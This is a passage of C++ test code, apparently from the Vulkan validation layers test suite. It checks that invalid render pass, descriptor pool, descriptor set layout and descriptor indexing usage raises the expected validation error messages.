m_commandBuffer->begin(); vk::CmdBeginRenderPass(m_commandBuffer->handle(), &rpbi, VK_SUBPASS_CONTENTS_INLINE); // Don't call vk::CmdEndRenderPass; as the begin has been "skipped" based on the error condition m_errorMonitor->VerifyFound(); m_commandBuffer->end(); vk::DestroyFramebuffer(m_device->device(), fb, NULL); vk::DestroyRenderPass(m_device->device(), rp, NULL); } TEST_F(VkLayerTest, AttachmentDescriptionUndefinedFormat) { TEST_DESCRIPTION("Create a render pass with an attachment description format set to VK_FORMAT_UNDEFINED"); ASSERT_NO_FATAL_FAILURE(Init()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_WARNING_BIT_EXT, "format is VK_FORMAT_UNDEFINED"); VkAttachmentReference color_attach = {}; color_attach.layout = VK_IMAGE_LAYOUT_GENERAL; color_attach.attachment = 0; VkSubpassDescription subpass = {}; subpass.colorAttachmentCount = 1; subpass.pColorAttachments = &color_attach; VkRenderPassCreateInfo rpci = {}; rpci.subpassCount = 1; rpci.pSubpasses = &subpass; rpci.attachmentCount = 1; VkAttachmentDescription attach_desc = {}; attach_desc.format = VK_FORMAT_UNDEFINED; attach_desc.samples = VK_SAMPLE_COUNT_1_BIT; attach_desc.finalLayout = VK_IMAGE_LAYOUT_GENERAL; rpci.pAttachments = &attach_desc; rpci.sType = VK_STRUCTURE_TYPE_RENDER_PASS_CREATE_INFO; VkRenderPass rp; VkResult result = vk::CreateRenderPass(m_device->device(), &rpci, NULL, &rp); m_errorMonitor->VerifyFound(); if (result == VK_SUCCESS) { vk::DestroyRenderPass(m_device->device(), rp, NULL); } } TEST_F(VkLayerTest, InvalidCreateDescriptorPool) { TEST_DESCRIPTION("Attempt to create descriptor pool with invalid parameters"); ASSERT_NO_FATAL_FAILURE(Init()); const uint32_t default_descriptor_count = 1; const VkDescriptorPoolSize dp_size_template{VK_DESCRIPTOR_TYPE_SAMPLER, default_descriptor_count}; const VkDescriptorPoolCreateInfo dp_ci_template{VK_STRUCTURE_TYPE_DESCRIPTOR_POOL_CREATE_INFO, nullptr, // pNext 0, // flags 1, // maxSets 1, // poolSizeCount &dp_size_template}; // try maxSets = 0 { VkDescriptorPoolCreateInfo invalid_dp_ci = dp_ci_template; invalid_dp_ci.maxSets = 0; // invalid maxSets value m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorPoolCreateInfo-maxSets-00301"); { VkDescriptorPool pool; vk::CreateDescriptorPool(m_device->device(), &invalid_dp_ci, nullptr, &pool); } m_errorMonitor->VerifyFound(); } // try descriptorCount = 0 { VkDescriptorPoolSize invalid_dp_size = dp_size_template; invalid_dp_size.descriptorCount = 0; // invalid descriptorCount value VkDescriptorPoolCreateInfo dp_ci = dp_ci_template; dp_ci.pPoolSizes = &invalid_dp_size; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorPoolSize-descriptorCount-00302"); { VkDescriptorPool pool; vk::CreateDescriptorPool(m_device->device(), &dp_ci, nullptr, &pool); } m_errorMonitor->VerifyFound(); } } TEST_F(VkLayerTest, DuplicateDescriptorBinding) { TEST_DESCRIPTION("Create a descriptor set layout with a duplicate binding number."); ASSERT_NO_FATAL_FAILURE(Init()); // Create layout where two binding #s are "1" static const uint32_t NUM_BINDINGS = 3; VkDescriptorSetLayoutBinding dsl_binding[NUM_BINDINGS] = {}; dsl_binding[0].binding = 1; dsl_binding[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[0].descriptorCount = 1; dsl_binding[0].stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dsl_binding[0].pImmutableSamplers = NULL; dsl_binding[1].binding = 0; dsl_binding[1].descriptorCount = 1; dsl_binding[1].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[1].descriptorCount = 1; dsl_binding[1].stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dsl_binding[1].pImmutableSamplers = NULL; dsl_binding[2].binding = 1; // Duplicate binding should cause error dsl_binding[2].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; dsl_binding[2].descriptorCount = 1; dsl_binding[2].stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT; dsl_binding[2].pImmutableSamplers = NULL; VkDescriptorSetLayoutCreateInfo ds_layout_ci = {}; ds_layout_ci.sType = VK_STRUCTURE_TYPE_DESCRIPTOR_SET_LAYOUT_CREATE_INFO; ds_layout_ci.pNext = NULL; ds_layout_ci.bindingCount = NUM_BINDINGS; ds_layout_ci.pBindings = dsl_binding; VkDescriptorSetLayout ds_layout; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutCreateInfo-binding-00279"); vk::CreateDescriptorSetLayout(m_device->device(), &ds_layout_ci, NULL, &ds_layout); m_errorMonitor->VerifyFound(); } TEST_F(VkLayerTest, InvalidPushDescriptorSetLayout) { TEST_DESCRIPTION("Create a push descriptor set layout with invalid bindings."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s Did not find VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME; skipped.\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); // Get the push descriptor limits auto push_descriptor_prop = GetPushDescriptorProperties(instance(), gpu()); if (push_descriptor_prop.maxPushDescriptors < 1) { // Some implementations report an invalid maxPushDescriptors of 0 printf("%s maxPushDescriptors is zero, skipping tests\n", kSkipPrefix); return; } VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR; ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &binding; // Note that as binding is referenced in ds_layout_ci, it is effectively in the closure by reference as well. auto test_create_ds_layout = [&ds_layout_ci, this](std::string error) { VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error); vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); }; // Starting with the initial VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER_DYNAMIC type set above.. test_create_ds_layout("VUID-VkDescriptorSetLayoutCreateInfo-flags-00280"); binding.descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER_DYNAMIC; test_create_ds_layout( "VUID-VkDescriptorSetLayoutCreateInfo-flags-00280"); // This is the same VUID as above, just a second error condition. if (!(push_descriptor_prop.maxPushDescriptors == std::numeric_limits<uint32_t>::max())) { binding.descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; binding.descriptorCount = push_descriptor_prop.maxPushDescriptors + 1; test_create_ds_layout("VUID-VkDescriptorSetLayoutCreateInfo-flags-00281"); } else { printf("%s maxPushDescriptors is set to maximum unit32_t value, skipping 'out of range test'.\n", kSkipPrefix); } } TEST_F(VkLayerTest, PushDescriptorSetLayoutWithoutExtension) { TEST_DESCRIPTION("Create a push descriptor set layout without loading the needed extension."); ASSERT_NO_FATAL_FAILURE(Init()); VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR; ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &binding; std::string error = "Attempted to use VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR in "; error = error + "VkDescriptorSetLayoutCreateInfo::flags but its required extension "; error = error + VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME; error = error + " has not been enabled."; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error.c_str()); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutCreateInfo-flags-00281"); VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); } TEST_F(VkLayerTest, DescriptorIndexingSetLayoutWithoutExtension) { TEST_DESCRIPTION("Create an update_after_bind set layout without loading the needed extension."); ASSERT_NO_FATAL_FAILURE(Init()); auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; std::string error = "Attemped to use VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT in "; error = error + "VkDescriptorSetLayoutCreateInfo::flags but its required extension "; error = error + VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME; error = error + " has not been enabled."; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, error.c_str()); VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); } TEST_F(VkLayerTest, DescriptorIndexingSetLayout) { TEST_DESCRIPTION("Exercise various create/allocate-time errors related to VK_EXT_descriptor_indexing."); if (!(CheckDescriptorIndexingSupportAndInitFramework(this, m_instance_extension_names, m_device_extension_names, NULL, m_errorMonitor))) { printf("%s Descriptor indexing or one of its dependencies not supported, skipping tests\n.", kSkipPrefix); return; } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); // Create a device that enables all supported indexing features except descriptorBindingUniformBufferUpdateAfterBind auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); indexing_features.descriptorBindingUniformBufferUpdateAfterBind = VK_FALSE; ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2)); std::array<VkDescriptorBindingFlagsEXT, 2> flags = {VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT, VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT}; auto flags_create_info = lvl_init_struct<VkDescriptorSetLayoutBindingFlagsCreateInfoEXT>(); flags_create_info.bindingCount = (uint32_t)flags.size(); flags_create_info.pBindingFlags = flags.data(); VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(&flags_create_info); ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &binding; VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; // VU for VkDescriptorSetLayoutBindingFlagsCreateInfoEXT::bindingCount flags_create_info.bindingCount = 2; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBindingFlagsCreateInfo-bindingCount-03002"); VkResult err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); flags_create_info.bindingCount = 1; // set is missing UPDATE_AFTER_BIND_POOL flag. m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutCreateInfo-flags-03000"); // binding uses a feature we disabled m_errorMonitor->SetDesiredFailureMsg( VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetLayoutBindingFlagsCreateInfo-descriptorBindingUniformBufferUpdateAfterBind-03005"); err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; ds_layout_ci.bindingCount = 0; flags_create_info.bindingCount = 0; err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); ASSERT_VK_SUCCESS(err); VkDescriptorPoolSize pool_size = {binding.descriptorType, binding.descriptorCount}; auto dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.poolSizeCount = 1; dspci.pPoolSizes = &pool_size; dspci.maxSets = 1; VkDescriptorPool pool; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; VkDescriptorSet ds = VK_NULL_HANDLE; // mismatch between descriptor set and pool m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-pSetLayouts-03044"); vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); if (indexing_features.descriptorBindingVariableDescriptorCount) { ds_layout_ci.flags = 0; ds_layout_ci.bindingCount = 1; flags_create_info.bindingCount = 1; flags[0] = VK_DESCRIPTOR_BINDING_VARIABLE_DESCRIPTOR_COUNT_BIT_EXT; err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); ASSERT_VK_SUCCESS(err); pool_size = {binding.descriptorType, binding.descriptorCount}; dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.poolSizeCount = 1; dspci.pPoolSizes = &pool_size; dspci.maxSets = 1; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto count_alloc_info = lvl_init_struct<VkDescriptorSetVariableDescriptorCountAllocateInfoEXT>(); count_alloc_info.descriptorSetCount = 1; // Set variable count larger than what was in the descriptor binding uint32_t variable_count = 2; count_alloc_info.pDescriptorCounts = &variable_count; ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(&count_alloc_info); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; ds = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetVariableDescriptorCountAllocateInfo-pSetLayouts-03046"); vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); m_errorMonitor->VerifyFound(); vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); } } TEST_F(VkLayerTest, DescriptorIndexingUpdateAfterBind) { TEST_DESCRIPTION("Exercise errors for updating a descriptor set after it is bound."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME) && DeviceExtensionSupported(gpu(), nullptr, VK_KHR_MAINTENANCE3_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_EXT_DESCRIPTOR_INDEXING_EXTENSION_NAME); m_device_extension_names.push_back(VK_KHR_MAINTENANCE3_EXTENSION_NAME); } else { printf("%s Descriptor Indexing or Maintenance3 Extension not supported, skipping tests\n", kSkipPrefix); return; } PFN_vkGetPhysicalDeviceFeatures2KHR vkGetPhysicalDeviceFeatures2KHR = (PFN_vkGetPhysicalDeviceFeatures2KHR)vk::GetInstanceProcAddr(instance(), "vkGetPhysicalDeviceFeatures2KHR"); ASSERT_TRUE(vkGetPhysicalDeviceFeatures2KHR != nullptr); // Create a device that enables all supported indexing features except descriptorBindingUniformBufferUpdateAfterBind auto indexing_features = lvl_init_struct<VkPhysicalDeviceDescriptorIndexingFeaturesEXT>(); auto features2 = lvl_init_struct<VkPhysicalDeviceFeatures2KHR>(&indexing_features); vkGetPhysicalDeviceFeatures2KHR(gpu(), &features2); indexing_features.descriptorBindingUniformBufferUpdateAfterBind = VK_FALSE; if (VK_FALSE == indexing_features.descriptorBindingStorageBufferUpdateAfterBind) { printf("%s Test requires (unsupported) descriptorBindingStorageBufferUpdateAfterBind, skipping\n", kSkipPrefix); return; } if (VK_FALSE == features2.features.fragmentStoresAndAtomics) { printf("%s Test requires (unsupported) fragmentStoresAndAtomics, skipping\n", kSkipPrefix); return; } ASSERT_NO_FATAL_FAILURE(InitState(nullptr, &features2, VK_COMMAND_POOL_CREATE_RESET_COMMAND_BUFFER_BIT)); ASSERT_NO_FATAL_FAILURE(InitViewport()); ASSERT_NO_FATAL_FAILURE(InitRenderTarget()); VkDescriptorBindingFlagsEXT flags[3] = {0, VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT, VK_DESCRIPTOR_BINDING_UPDATE_AFTER_BIND_BIT_EXT}; auto flags_create_info = lvl_init_struct<VkDescriptorSetLayoutBindingFlagsCreateInfoEXT>(); flags_create_info.bindingCount = 3; flags_create_info.pBindingFlags = &flags[0]; // Descriptor set has two bindings - only the second is update_after_bind VkDescriptorSetLayoutBinding binding[3] = { {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, {1, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, {2, VK_DESCRIPTOR_TYPE_STORAGE_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}, }; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(&flags_create_info); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_UPDATE_AFTER_BIND_POOL_BIT_EXT; ds_layout_ci.bindingCount = 3; ds_layout_ci.pBindings = &binding[0]; VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; VkResult err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); VkDescriptorPoolSize pool_sizes[3] = { {binding[0].descriptorType, binding[0].descriptorCount}, {binding[1].descriptorType, binding[1].descriptorCount}, {binding[2].descriptorType, binding[2].descriptorCount}, }; auto dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.flags = VK_DESCRIPTOR_POOL_CREATE_UPDATE_AFTER_BIND_BIT_EXT; dspci.poolSizeCount = 3; dspci.pPoolSizes = &pool_sizes[0]; dspci.maxSets = 1; VkDescriptorPool pool; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; VkDescriptorSet ds = VK_NULL_HANDLE; vk::AllocateDescriptorSets(m_device->handle(), &ds_alloc_info, &ds); ASSERT_VK_SUCCESS(err); VkBufferCreateInfo buffCI = {}; buffCI.sType = VK_STRUCTURE_TYPE_BUFFER_CREATE_INFO; buffCI.size = 1024; buffCI.usage = VK_BUFFER_USAGE_UNIFORM_BUFFER_BIT | VK_BUFFER_USAGE_STORAGE_BUFFER_BIT; VkBuffer dynamic_uniform_buffer; err = vk::CreateBuffer(m_device->device(), &buffCI, NULL, &dynamic_uniform_buffer); ASSERT_VK_SUCCESS(err); VkDeviceMemory mem; VkMemoryRequirements mem_reqs; vk::GetBufferMemoryRequirements(m_device->device(), dynamic_uniform_buffer, &mem_reqs); VkMemoryAllocateInfo mem_alloc_info = {}; mem_alloc_info.sType = VK_STRUCTURE_TYPE_MEMORY_ALLOCATE_INFO; mem_alloc_info.allocationSize = mem_reqs.size; m_device->phy().set_memory_type(mem_reqs.memoryTypeBits, &mem_alloc_info, VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT); err = vk::AllocateMemory(m_device->device(), &mem_alloc_info, NULL, &mem); ASSERT_VK_SUCCESS(err); err = vk::BindBufferMemory(m_device->device(), dynamic_uniform_buffer, mem, 0); ASSERT_VK_SUCCESS(err); VkDescriptorBufferInfo buffInfo[2] = {}; buffInfo[0].buffer = dynamic_uniform_buffer; buffInfo[0].offset = 0; buffInfo[0].range = 1024; VkWriteDescriptorSet descriptor_write[2] = {}; descriptor_write[0].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET; descriptor_write[0].dstSet = ds; descriptor_write[0].dstBinding = 0; descriptor_write[0].descriptorCount = 1; descriptor_write[0].descriptorType = VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER; descriptor_write[0].pBufferInfo = buffInfo; descriptor_write[1] = descriptor_write[0]; descriptor_write[1].dstBinding = 1; descriptor_write[1].descriptorType = VK_DESCRIPTOR_TYPE_STORAGE_BUFFER; VkPipelineLayout pipeline_layout; VkPipelineLayoutCreateInfo pipeline_layout_ci = {}; pipeline_layout_ci.sType = VK_STRUCTURE_TYPE_PIPELINE_LAYOUT_CREATE_INFO; pipeline_layout_ci.setLayoutCount = 1; pipeline_layout_ci.pSetLayouts = &ds_layout; vk::CreatePipelineLayout(m_device->device(), &pipeline_layout_ci, NULL, &pipeline_layout); // Create a dummy pipeline, since VL inspects which bindings are actually used at draw time char const *fsSource = "#version 450\n" "\n" "layout(location=0) out vec4 color;\n" "layout(set=0, binding=0) uniform foo0 { float x0; } bar0;\n" "layout(set=0, binding=1) buffer foo1 { float x1; } bar1;\n" "layout(set=0, binding=2) buffer foo2 { float x2; } bar2;\n" "void main(){\n" " color = vec4(bar0.x0 + bar1.x1 + bar2.x2);\n" "}\n"; VkShaderObj vs(m_device, bindStateVertShaderText, VK_SHADER_STAGE_VERTEX_BIT, this); VkShaderObj fs(m_device, fsSource, VK_SHADER_STAGE_FRAGMENT_BIT, this); VkPipelineObj pipe(m_device); pipe.SetViewport(m_viewports); pipe.SetScissor(m_scissors); pipe.AddDefaultColorAttachment(); pipe.AddShader(&vs); pipe.AddShader(&fs); pipe.CreateVKPipeline(pipeline_layout, m_renderPass); // Make both bindings valid before binding to the command buffer vk::UpdateDescriptorSets(m_device->device(), 2, &descriptor_write[0], 0, NULL); m_errorMonitor->VerifyNotFound(); VkSubmitInfo submit_info = {}; submit_info.sType = VK_STRUCTURE_TYPE_SUBMIT_INFO; submit_info.commandBufferCount = 1; submit_info.pCommandBuffers = &m_commandBuffer->handle(); // Two subtests. First only updates the update_after_bind binding and expects // no error. Second updates the other binding and expects an error when the // command buffer is ended. for (uint32_t i = 0; i < 2; ++i) { m_commandBuffer->begin(); vk::CmdBindDescriptorSets(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipeline_layout, 0, 1, &ds, 0, NULL); m_commandBuffer->BeginRenderPass(m_renderPassBeginInfo); vk::CmdBindPipeline(m_commandBuffer->handle(), VK_PIPELINE_BIND_POINT_GRAPHICS, pipe.handle()); vk::CmdDraw(m_commandBuffer->handle(), 0, 0, 0, 0); vk::CmdEndRenderPass(m_commandBuffer->handle()); m_errorMonitor->VerifyNotFound(); // Valid to update binding 1 after being bound vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write[1], 0, NULL); m_errorMonitor->VerifyNotFound(); if (i == 0) { // expect no errors m_commandBuffer->end(); m_errorMonitor->VerifyNotFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-DescriptorSetNotUpdated"); vk::QueueSubmit(m_device->m_queue, 1, &submit_info, VK_NULL_HANDLE); m_errorMonitor->VerifyFound(); vk::QueueWaitIdle(m_device->m_queue); } else { // Invalid to update binding 0 after being bound. But the error is actually // generated during vk::EndCommandBuffer vk::UpdateDescriptorSets(m_device->device(), 1, &descriptor_write[0], 0, NULL); m_errorMonitor->VerifyNotFound(); m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "UNASSIGNED-CoreValidation-DrawState-InvalidCommandBuffer-VkDescriptorSet"); vk::EndCommandBuffer(m_commandBuffer->handle()); m_errorMonitor->VerifyFound(); } } vk::DestroyDescriptorSetLayout(m_device->handle(), ds_layout, nullptr); vk::DestroyDescriptorPool(m_device->handle(), pool, nullptr); vk::DestroyBuffer(m_device->handle(), dynamic_uniform_buffer, NULL); vk::FreeMemory(m_device->handle(), mem, NULL); vk::DestroyPipelineLayout(m_device->handle(), pipeline_layout, NULL); } TEST_F(VkLayerTest, AllocatePushDescriptorSet) { TEST_DESCRIPTION("Attempt to allocate a push descriptor set."); if (InstanceExtensionSupported(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME)) { m_instance_extension_names.push_back(VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_GET_PHYSICAL_DEVICE_PROPERTIES_2_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitFramework(myDbgFunc, m_errorMonitor)); if (DeviceExtensionSupported(gpu(), nullptr, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME)) { m_device_extension_names.push_back(VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); } else { printf("%s %s Extension not supported, skipping tests\n", kSkipPrefix, VK_KHR_PUSH_DESCRIPTOR_EXTENSION_NAME); return; } ASSERT_NO_FATAL_FAILURE(InitState()); auto push_descriptor_prop = GetPushDescriptorProperties(instance(), gpu()); if (push_descriptor_prop.maxPushDescriptors < 1) { // Some implementations report an invalid maxPushDescriptors of 0 printf("%s maxPushDescriptors is zero, skipping tests\n", kSkipPrefix); return; } VkDescriptorSetLayoutBinding binding = {0, VK_DESCRIPTOR_TYPE_UNIFORM_BUFFER, 1, VK_SHADER_STAGE_FRAGMENT_BIT, nullptr}; auto ds_layout_ci = lvl_init_struct<VkDescriptorSetLayoutCreateInfo>(); ds_layout_ci.flags = VK_DESCRIPTOR_SET_LAYOUT_CREATE_PUSH_DESCRIPTOR_BIT_KHR; ds_layout_ci.bindingCount = 1; ds_layout_ci.pBindings = &binding; VkDescriptorSetLayout ds_layout = VK_NULL_HANDLE; VkResult err = vk::CreateDescriptorSetLayout(m_device->handle(), &ds_layout_ci, nullptr, &ds_layout); ASSERT_VK_SUCCESS(err); VkDescriptorPoolSize pool_size = {binding.descriptorType, binding.descriptorCount}; auto dspci = lvl_init_struct<VkDescriptorPoolCreateInfo>(); dspci.poolSizeCount = 1; dspci.pPoolSizes = &pool_size; dspci.maxSets = 1; VkDescriptorPool pool; err = vk::CreateDescriptorPool(m_device->handle(), &dspci, nullptr, &pool); ASSERT_VK_SUCCESS(err); auto ds_alloc_info = lvl_init_struct<VkDescriptorSetAllocateInfo>(); ds_alloc_info.descriptorPool = pool; ds_alloc_info.descriptorSetCount = 1; ds_alloc_info.pSetLayouts = &ds_layout; VkDescriptorSet ds = VK_NULL_HANDLE; m_errorMonitor->SetDesiredFailureMsg(VK_DEBUG_REPORT_ERROR_BIT_EXT, "VUID-VkDescriptorSetAllocateInfo-pSetLayouts-00308"); 